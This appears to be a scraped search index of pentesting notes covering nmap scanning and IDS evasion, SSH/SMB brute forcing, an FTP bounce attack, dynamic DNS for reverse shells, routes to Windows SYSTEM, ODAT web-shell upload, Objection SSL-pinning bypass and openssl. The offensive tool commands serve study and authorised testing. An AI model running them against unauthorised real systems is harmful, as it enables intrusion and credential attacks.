    nmap 10.0.2.1\nnmap 10.0.2.1/24\nnmap 10.0.2.1-254\nnmap 10.0.*.*\nnmap 10.0.2.1,3,17\nnmap 10.0.2,4.1,3,17\nnmap domain.com\nnmap 10.0.2.1 -p 3389\nnmap 10.0.2.1 -p 80,3389\nnmap 10.0.2.1 -p 50-90\nnmap 10.0.2.1 -p U:53, T:80\n\n# ***** Saving results ******\n# -----------------------------------------\n# -oN: Normal output with .nmap file extension\n# -oG: Grepable output with the .gnmap file extension\n# -oX: XML output  with the .xml file extension\n# -oA: Save results in all formats\n# -oA target: Saves the results in all formats, starting the name of each file with 'target'.\nsudo nmap $ip -oA path/to/target\n\n\n# It forces port enumeration and it's not limited to 1000 ports\nnmap $ip -p-     \n\n# Disables port scanning. If we disable port scan (`-sn`), Nmap automatically ping scan with `ICMP Echo Requests` (`-PE`). Also called ping scan or ping sweep. More reliable that pinging the broadcast address because hosts do not reply to broadcast queries).\nnmap -sn $ip\n\n# Disables DNS resolution.\nnmap -n $ip\n\n# Disables ARP ping.\nnmap $ip --disable-arp-ping\n\n# This option skips the host discovery stage altogether. It deactivates the ICMP echo requests\nnmap  -Pn  $ip  \n\n# Scans top 100 ports.\nnmap  -F  $ip \n\n# Shows the progress of the scan every 5 seconds.\nnmap $ip --stats-every=5s\n\n# To skip host discovery and port scan, while still allowing NMAP Scripting Engine to run, we use -Pn -sn combined.\nnmap -Pn -sn $ip\n\n# OS detection\nnmap -O $ip \n\n# Limit OS detection to promising targets\nnmap -O $ip -osscan-limit\n\n# Guess OS more aggressively\nnmap -O $ip -osscan-guess\n\n# Version detection\nnmap -sV $ip \n\n# Intensity level goes from 0 to 9\nnmap -sV $ip \u2013-version-intensity 8  \n\n# tcpwrapped means that the TCP handshake was completed, \n# but the remote host closed the connection without receiving any data. \n# This means that something is blocking connectivity with the target host. \n\n# OS detection + version detection + script scanning + traceroute\nnmap -A $ip\n\n# Half-open scanning. SYN + SYN ACK + RST\n# A well-configured IDS will still detect the scan\nnmap -sS $ip\n\n# TCP connect scan: SYN + SYN ACK + ACK + DATA (banner) +RST\n# This scan gets recorded in the application logs on the target systems\nnmap -sT $ip\n\n# Scan a list of hosts. One per line in the file\nnmap -sn -iL $ip hosttoscanlist.txt \n\n# List targets to scan\nnmap -sL $ip \n\n# Full scanner\nnmap -sC -sV -p- $ip  \n# The script scan `-sC` flag causes `Nmap` to report the server headers `http-server-header` page and the page title `http-title` for any web page hosted on the webserver.\n\n\n# UDP quick\nnmap -sU -sV  $ip\n\n# Called ACK scan. Returns if the port is filtered or not. Useful to determine if there is a firewall.\nnmap -sA $ip \n\n# It sends a ACK packet. In the response we pay attention to the windows size of the TCP header. If the windows size is different from zero, the port is open. If it is zero, then port is either closed or filtered. \nnmap -sW $ip\n

    To redirect results to a file > targetfile.txt

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#search-and-run-a-script-in-nmap","title":"Search and run a script in nmap","text":"

    NSE: Nmap Scripting Engine.

    # All scripts are located under:\n/usr/share/nmaps/script\n\n\nlocate -r nse$|grep <term>\n# if this doesn\u2019t work, update the db with:\nsudo updatedb\n\n\n# Also:\nlocate scripts/<nameOfservice>\n

    Run a script:

    # Run default scripts \nnmap $ip -sC\n\n# Run  scripts from a category. See categories below\nnmap $ip --script <category>\n\n# Run specific scripts\nnmap --script <script-name>,<script-name>,<script-name> -p<port> $ip\n

    NSE (Nmap Script Engine) provides us with the possibility to create scripts in Lua for interaction with certain services. There are a total of 14 categories into which these scripts can be divided:

    Category Description auth Determination of authentication credentials. broadcast Scripts, which are used for host discovery by broadcasting and the discovered hosts, can be automatically added to the remaining scans. brute Executes scripts that try to log in to the respective service by brute-forcing with credentials. default Default scripts executed by using the -sC option. Syntax: sudo nmap $ip -sCdiscovery Evaluation of accessible services. dos These scripts are used to check services for denial of service vulnerabilities and are used less as it harms the services. exploit This category of scripts tries to exploit known vulnerabilities for the scanned port. external Scripts that use external services for further processing. fuzzer This uses scripts to identify vulnerabilities and unexpected packet handling by sending different fields, which can take much time. intrusive Intrusive scripts that could negatively affect the target system. malware Checks if some malware infects the target system. safe Defensive scripts that do not perform intrusive and destructive access. version Extension for service detection. vuln Identification of specific vulnerabilities.","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#general-vulnerability-assessment","title":"General vulnerability assessment","text":"
    sudo nmap $ip -p 80 -sV --script vuln \n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-21-footprinting-ftp","title":"Port 21: footprinting FTP","text":"
    # Locate all ftp scripts related\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scanner for version, mode aggresive and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-22-attack-a-ssh-connection","title":"Port 22: attack a ssh connection","text":"
    nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports-137-138-139-445-footprinting-smb","title":"Ports 137, 138, 139, 445: footprinting SMB","text":"
    sudo nmap $ip -sV -sC -p139,445\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#grab-banners-of-services","title":"Grab banners of services","text":"
    # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#enumerate-samba-service-smb","title":"Enumerate samba service (smb)","text":"
    # 1. Search for existing script for smb enumeration\nlocate -r nse$|grep <term>\n\n# 2. Select smb-enum-shares and run it\nnmap -script=smb-enum-shares $ip\n\n# 3. Retrieve users\nnmap -script=smb-enum-users $ip\n\n# 4. Retrieve groups with passwords and user\nnmap -script=smb-brute $ip\n\n# Interact with the SMB service to extract the reported operating system version\nnmap --script smb-os-discovery.nse -p445 $ip\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performance","title":"Performance","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#introducing-delays-or-timeouts","title":"Introducing delays or Timeouts","text":"

    When Nmap sends a packet, it takes some time (Round-Trip-Time - RTT) to receive a response from the scanned port. Generally, Nmap starts with a high timeout (--min-RTT-timeout) of 100ms.

    # While connecting to the service, we noticed that the connection took longer than usual (about 15 seconds). There are some services whose connection speed, or response time, can be configured. Now that we know that an FTP server is running on this port, we can deduce the origin of our \"failed\" scan. We could confirm this again by specifying the minimum `probe round trip time` (`--min-rtt-timeout`) in Nmap to 15 or 20 seconds and rerunning the scan.\nnmap $IP --min-rtt-timeout 15\n\n# Optimized RTT\nsudo nmap IP/24 -F --initial-rtt-timeout 50ms --max-rtt-timeout 100ms\n# -F: Scans top 100 ports.\n# --initial-rtt-timeout 50ms: Sets the specified time value as initial RTT timeout.\n# --max-rtt-timeout 100ms: Sets the specified time value as maximum RTT timeout.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#max-retries","title":"Max Retries","text":"

    The default value for the retry rate is 10, so if Nmap does not receive a response for a port, it will not send any more packets to the port and will be skipped.

    sudo nmap $ip/24 -F --max-retries 0\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#rates","title":"Rates","text":"

    When setting the minimum rate (--min-rate) for sending packets, we tell Nmap to simultaneously send the specified number of packets.

    sudo nmap $ip/24 -F --min-rate 300\n# --min-rate 300 Sets the minimum number of packets to be sent per second.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#timing","title":"Timing","text":"

    Nmap offers six different timing templates (-T <0-5>), being defaul one, -T 3.

    Flag Mode -T 0 Paranoid -T 1 Sneaky -T 2 Polite -T 3 Normal -T 4 Aggressive -T 5 Insane

    More on nmap documentation.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#firewall-and-idsips-evasion-with-nmap","title":"Firewall and IDS/IPS Evasion with nmap","text":"

    An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state.

    1. An adversary sends TCP packets with the ACK flag set and a sequence number of zero (which means that are not associated with an existing connection to target ports).

    2. An adversary uses the response from the target to determine the port's state.

      • Filtered port: The target ignores the packets, and dropped them. No response is returned or ICMP error codes.
      • Unfiltered port: The target rejects the packets and returned an RST flag and different types of ICMP error codes (or none at all): Net Unreachable, Net Prohibited, Host Unreachable, Host Prohibited, Port Unreachable. If a RST packet is received the target port is either closed or the ACK was sent out-of-sync.

    Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#detect-a-waf","title":"Detect a WAF","text":"
    nmap -p 80 -script http-waf-detect $ip \n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#decoys","title":"Decoys","text":"

    There are cases in which administrators block specific subnets from different regions in principle. Decoys can be used for SYN, ACK, ICMP scans, and OS detection scans.

    With the Decoy scanning method (-D), Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent.

    sudo nmap $ip -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5\n# -D RND:5  Generates five random IP addresses that indicates the source IP the connection comes from.\n

    Manually specify IP address (-S) for getting to services only accessible from individual subnets:

    sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0\n# -n: Disables DNS resolution.\n# -Pn: Disables ICMP Echo requests.\n# -p 445: Scans only the specified ports.\n# -O: Performs operation system detection scan.\n# -S: Scans the target by using different source IP address.\n# -e tun0: Sends all requests through the specified interface.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#dns-proxying","title":"DNS proxying","text":"

    The DNS queries are made over the UDP port 53. The TCP port 53 was previously only used for the so-called \"Zone transfers\" between the DNS servers or data transfer larger than 512 bytes. More and more, this is changing due to IPv6 and DNSSEC expansions. These changes cause many DNS requests to be made via TCP port 53.

    Bypassing demilitarized zone (DMZ) by specifying DNS servers ourselves (we can use the company's DNS server). --dns-server <ns>,<ns>

    We can also use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

    Example:

    # Simple SYS-Scan of a filtered port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace\n# PORT      STATE    SERVICE\n# 50000/tcp filtered ibm-db2\n\n\n# SYN-Scan From DNS Port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53\n# PORT      STATE SERVICE\n# 50000/tcp open  ibm-db2\n

    Following the example, a possible exploitation for this weak configuration would be:

    nc -nv -p 53 $ip 50000\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#udp-scans-not-working-on-vpn-connections","title":"UDP scans not working on VPN connections","text":"

    Explanation from https://www.reddit.com/r/nmap/comments/u08lud/havin_a_rough_go_of_trying_to_scan_a_subnet_with/:

    As others have pointed out, scanning over a VPN link means you are limited to\u00a0internet-layer\u00a0interactions and operations. The \"V\" in VPN stands for Virtual, and means that you are not actually on the same link as the other hosts in your subnet, so you can't get information about their link-layer connections any more than they can know whether you've connected to the VPN via Starbucks WiFi, an Ethernet cable, or a dial-up modem.

    You are further limited by the fact that Windows does not offer a general-purpose raw socket interface, so Nmap can't craft special packets at the network/internet layer. Usually we work around this by crafting Ethernet (link-layer) frames and injecting those with\u00a0Npcap, but VPN links do not use Ethernet frames, so that method doesn't work. We hope to be able to add this functionality in the future, but for now, VPNs are tricky to use with Npcap, and we haven't implemented PPTP or other VPN framing in Nmap to make it work. You can still do TCP Connect scanning (-sT), run most NSE scripts (-sC\u00a0or\u00a0--script), and do service version detection (-sV), but things like TCP SYN scan (-sS), UDP scanning (-sU), OS detection (-O), and traceroute (--traceroute) will not work.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-nmap-works","title":"How nmap works","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports","title":"Ports","text":"

    Open port:

    This indicates that the connection to the scanned port has been established. These connections can be TCP connections, UDP datagrams as well as SCTP associations.

    Filtered port:

    Nmap cannot correctly identify whether the scanned port is open or closed because either no response is returned from the target for the port or we get an error code from the target.

    Close port:

    When the port is shown as closed, the TCP protocol indicates that the packet we received back contains an RST flag. This scanning method can also be used to determine if our target is alive or not.

    Unfiltered port:

    This state of a port only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined whether it is open or closed.

    **open|filtered ** port:

    If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.

    closed|filtered port:

    This state only occurs in the IP ID idle scans and indicates that it was impossible to determine if the scanned port is closed or filtered by a firewall.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#probes-for-host-discovery","title":"Probes for HOST discovery","text":"
    TCP SYN probe (-PS <portlist>)\nTCP ACK probe (-PA <portlist>)\nUDP probe (-PU <portlist>)\nICMP Echo Request/Ping (-PE)\nICMP Timestamp Request (-PP)\nICMP Netmask Request (-PM)\n

    List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1723. These are valuable ping ports.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#scans","title":"Scans","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-ss-or-tcp-syn-scan","title":"-sS (or TCP SYN scan)","text":"

    By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Therefore, by default, Nmap performs a SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). Unprivileged users can only execute connect and FTP bounce scans.

    • No connection established, but we got our response.
    • Technique referred as half-open scanning, because you don't open a full TCP connection.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-st-or-tcp-connect-scan","title":"-sT (or TCP Connect scan)","text":"

    TCP connect scan is the default TCP scan type when SYN scan is not an option (when not running with privileges). The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends an SYN packet to the target port and waits for a response. It is considered open if the target port responds with an SYN-ACK packet and closed if it responds with an RST packet.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sn-a-null-scan","title":"-sN (A NULL scan)","text":"

    In the SYN message that nmap sends, TCP flag header is set to 0.

    If the response is:

    • none: the port is open or filtered.
    • RST: the port is closed.
    • A response saying that it couldn't reach destiny, the port is filtered.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sa-ack-scan","title":"-sA (ACK scan)","text":"

    Returns if the port is filtered or not. It's useful to detect a firewall. Filtered ports reveals the existence of some kind of firewall.

    A variation of the TCP ACK scan is the TCP Windows scan.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sw-tcp-windows-scan","title":"-sW (TCP Windows scan)","text":"

    It also sends an ACK packet. In the response we pay attention to the Windows size of the TCP header_

    • If the windows size is different from 0, the port is open.
    • If the windows size is 0, the port is either close or filtered.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-to-identify-operating-system-using-ttl-value-and-ping-command","title":"How To Identify Operating System Using TTL Value And Ping Command","text":"

    After running:

    sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping \n

    We can get:

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST\nSENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]\nRCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]\nNmap scan report for 10.129.2.18\nHost is up (0.086s latency).\nMAC Address: DE:AD:00:00:BE:EF\nNmap done: 1 IP address (1 host up) scanned in 0.11 seconds\n

    You can quickly detect whether a system is running with Linux, or Windows or any other OS by looking at the TTL value from the output of the ping command. You don't need any extra applications to detect a remote system's OS. The default initial TTL value for Linux/Unix is 64, and TTL value for Windows is 128.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#saving-the-results","title":"Saving the results","text":"
    -oN: Normal output with .nmap file extension\n-oG: Grepable output with the .gnmap file extension\n-oX: XML output  with the .xml file extension\n-oA: Save results in all formats\n

    With the XML output, we can easily create HTML reports. To convert the stored results from XML format to HTML, we can use the tool xsltproc.

    xsltproc target.xml -o target.html\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#quick-techniques","title":"Quick techniques","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#host-enumeration-determining-if-host-is-alive-with-arp-ping","title":"Host Enumeration: Determining if host is alive with ARP ping","text":"

    It can be done with -packet-trace or with --reason.

    sudo nmap <IP> -sn -oA host -PE --packet-trace\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --packet-trace    Shows all packets sent and received\n
    sudo nmap <IP> -sn -oA host -PE --reason\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --reason  Displays the reason for specific result.\n

    To disable ARP requests and scan our target with the desired ICMP echo requests, we can disable ARP pings by setting the \"--disable-arp-ping\" option.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-scanning-having-a-clear-view-of-a-syn-scan-on-a-port","title":"Port scanning: having a clear view of a SYN scan on a port","text":"

    To have a clear view of the SYN scan on port 21, disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping).

    sudo nmap <IP> -p 21 --packet-trace -Pn -n --disable-arp-ping\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performing-a-ftp-bounce-attack","title":"Performing a FTP bounce attack","text":"

    An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targetting an FTP Server\u00a0FTP_DMZ\u00a0exposed to the internet. Another device within the same network,\u00a0Internal_DMZ, is not exposed to the internet. We can use the connection to the\u00a0FTP_DMZ\u00a0server to scan\u00a0Internal_DMZ\u00a0using the FTP Bounce attack and obtain information about the server's open ports.

    nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b The\u00a0`Nmap`\u00a0-b flag can be used to perform an FTP bounce attack: \n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"noip/","title":"noip","text":"

    When coding a reverse shell you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS server such as https://www.noip.com/. To inform this server of our attacker IP public address we will install a linux dynamic client on our kali (an agent that will do the trick).

    ","tags":["pentesting","python"]},{"location":"noip/#install-dynamic-update-client-on-linux","title":"Install Dynamic Update Client on Linux","text":"

    As root user:

    cd /usr/local/src/\nwget http://www.noip.com/client/linux/noip-duc-linux.tar.gz\ntar xf noip-duc-linux.tar.gz\ncd noip-2.1.9-1/\nmake install\n
    ","tags":["pentesting","python"]},{"location":"nslookup/","title":"nslookup","text":"

    With Nslookup, we can search for domain name servers on the Internet and ask them for information about hosts and domains.

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

    References: - nslookup (https://linux.die.net/man/1/nslookup)

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"nt-authority-system/","title":"NT Authority System","text":"

    The LocalSystem account NT AUTHORITY\\SYSTEM is a built-in account in Windows operating systems, used by the service control manager. It has the highest level of access in the OS (and can be made even more powerful with Trusted Installer privileges). This account has more privileges than a local administrator account and is used to run most Windows services. It is also very common for third-party services to run in the context of this account by default. The SYSTEM account has thist privileges:

    SE_ASSIGNPRIMARYTOKEN_NAME, SE_AUDIT_NAME, SE_BACKUP_NAME, SE_CHANGE_NOTIFY_NAME, SE_CREATE_GLOBAL_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_PERMANENT_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_IMPERSONATE_NAME, SE_INC_BASE_PRIORITY_NAME, SE_INCREASE_QUOTA_NAME, SE_LOAD_DRIVER_NAME, SE_LOCK_MEMORY_NAME, SE_MANAGE_VOLUME_NAME, SE_PROF_SINGLE_PROCESS_NAME, SE_RESTORE_NAME, SE_SECURITY_NAME, SE_SHUTDOWN_NAME, SE_SYSTEM_ENVIRONMENT_NAME, SE_SYSTEMTIME_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME, SE_UNDOCK_NAME

    The SYSTEM account on a domain-joined host can enumerate Active Directory by impersonating the computer account, which is essentially a special user account. If you land on a domain-joined host with SYSTEM privileges during an assessment and cannot find any useful credentials in memory or other data on the machine, there are still many things you can do. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting.

    There are several ways to gain SYSTEM-level access on a host, including but not limited to:

    • Remote Windows exploits such as EternalBlue or BlueKeep.
    • Abusing a service running in the context of the SYSTEM account.
    • Abusing SeImpersonate privileges using RottenPotatoNG against older Windows systems, Juicy Potato, or PrintSpoofer if targeting Windows 10/Windows Server 2019.
    • Local privilege escalation flaws in Windows operating systems such as the Windows 10 Task Scheduler 0day.
    • PsExec with the -s flag
    ","tags":["active directory","ldap","windows"]},{"location":"objection/","title":"Objection","text":"

    What it does? It makes a regular ADB connection ant start the frida server in the device. If you are using a rooted device it is needed to select the application that you want to test inside the --gadget option.

    ","tags":["mobile pentesting"]},{"location":"objection/#installation","title":"Installation","text":"
    pip3 install objection\n
    ","tags":["mobile pentesting"]},{"location":"objection/#usage","title":"Usage","text":"

    What it does? It makes a regular ADB connection ant start the frida server in the device. If you are using a rooted device it is needed to select the application that you want to test inside the --gadget option.

    In the metromadrid app, this would be:

    objection --gedget es.metromadrid.metroandroid explore\n
    ","tags":["mobile pentesting"]},{"location":"objection/#basic-commands","title":"Basic commands","text":"
    # Some interesting information (like passwords, paths...) could be found inside the environment.\nenv\n\nfile download <remotepath> [<localpath>]\nfile upload <localpath> [<remotepath>]\nimport <localpath frida-script>\n\n# Disable SSL pinning on android devices\nandroid sslpinningdisable\n
    ","tags":["mobile pentesting"]},{"location":"oci-fundamentals-preparation/","title":"Notes","text":"

    Oci has more than 80 services.

    Instead of regions and availability zones, in Oracle we have Regions and Availability Domains. Instead of datacenters as next level, we have fault domains.

    Instead of datacenters as next level, we have fault domains.

    "},{"location":"odat/","title":"odat - Oracle Database Attacking Tool","text":"

    Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#installation","title":"Installation","text":"

    This script installs the needed packages and tools:

    #!/bin/bash\n\nsudo apt-get install libaio1 python3-dev alien python3-pip -y\ngit clone https://github.com/quentinhardy/odat.git\ncd odat/\ngit submodule init\nsudo submodule update\nsudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y\npip3 install cx_Oracle\nsudo apt-get install python3-scapy -y\nsudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap\nsudo pip3 install argcomplete && sudo activate-global-python-argcomplete\n

    Check installation with:

    ./odat.py -h\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#basic-usage","title":"Basic usage","text":"

    We can use the odat.py from ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations,...

    /odat.py all -s $ip\n

    Upload a web shell to the target:

    # Upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n\n## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odata-pentesting/","title":"Pentesting oData","text":"

    The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful2 data services that can be used to publish and edit resources that are identified using uniform resource identifiers (URIs) with simple HTTP messages.

    ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"odata-pentesting/#the-service-metadata-document","title":"The Service Metadata Document","text":"

    It usually has this syntax:

    http://localhost:32026/OData/OData.svc/$metadata\n

    https://infosecwriteups.com/unauthorized-access-to-odata-entities-2k-bounty-from-microsoft-e070b2ef88c2

    The\u00a0**OData metadata**\u00a0is a data model of the system(consider it as\u00a0**information_schema**\u00a0in relational databases). For each metadata, we have\u00a0**entities**(similar to\u00a0**tables**\u00a0in relational databases) and\u00a0**properties**\u00a0(similar to\u00a0**columns**) as well as the relationship between different entity types. Each entity type has an\u00a0**entity key**\u00a0that is similar to the key in relational databases.\n
    ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"onesixtyone/","title":"onesixtyone - Fast and simple SNMP scanner","text":"

    See SNMP for details about the protocol.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/trailofbits/onesixtyone.

    sudo apt install onesixtyone\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#basic-usage","title":"Basic usage","text":"
    onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"openssl/","title":"openSSL - Cryptography and SSL/TLS Toolkit","text":"

    openSSL Website.

    ","tags":["openssl"]},{"location":"openssl/#basic-usage","title":"Basic usage","text":"
    openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
    • Create self signed certificates.
    • Encrypt/Decrypt files
    • Generate private/public keys.
    • Encrypt/Decrypt files with public/private keys.
    # Pwnbox - Create a Self-Signed Certificate\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iterations counts with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: Specify the entry parameter\n\n# Decrypt a dile with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
    ","tags":["openssl"]},{"location":"openvas/","title":"OpenVAS","text":"

    OpenVAS by Greenbone Networks is a publicly available open-source vulnerability scanner. OpenVAS can perform network scans, including authenticated and unauthenticated testing.

    Scans may take 1-2 hours to finish.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#installation","title":"Installation","text":"
    # Updating packages\nsudo apt-get update && apt-get -y full-upgrade\n\n# Install the tool\nsudo apt-get install gvm && openvas\n\n# Initiate setup process\nsudo gvm-setup\n\n\n# Check installation\nsudo gvm-check-setup\n\n\n\n# Start OpenVAS\nsudo gvm-start\n

    Openvas stands for Open Vulnerability Assessment Scanner. It's based on assets (not on scans). These assets may be hosts, operating systems, TLS certificates... Scans are called here Tasks.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#basic-usage","title":"Basic usage","text":"
    # Start OpenVAS\nsudo gvm-start\n

    Go to https://$ip:8080

    Documentation.

    • Base: This scan configuration is meant to enumerate information about the host's status and operating system information.
    • Discovery: Enumerate host's services, hardware, accessible ports, and software being used on the system.
    • Host Discovery: Whether the host is alive and determines what devices are active on the network. OpenVAS leverages ping to identify if the host is alive.
    • System Discovery: Enumerates the target host further than the 'Discovery Scan' and attempts to identify the operating system and hardware associated with the host.
    • Full and fast: This configuration is recommended by OpenVAS as the safest option and leverages intelligence to use the best NVT checks for the host(s) based on the accessible ports.

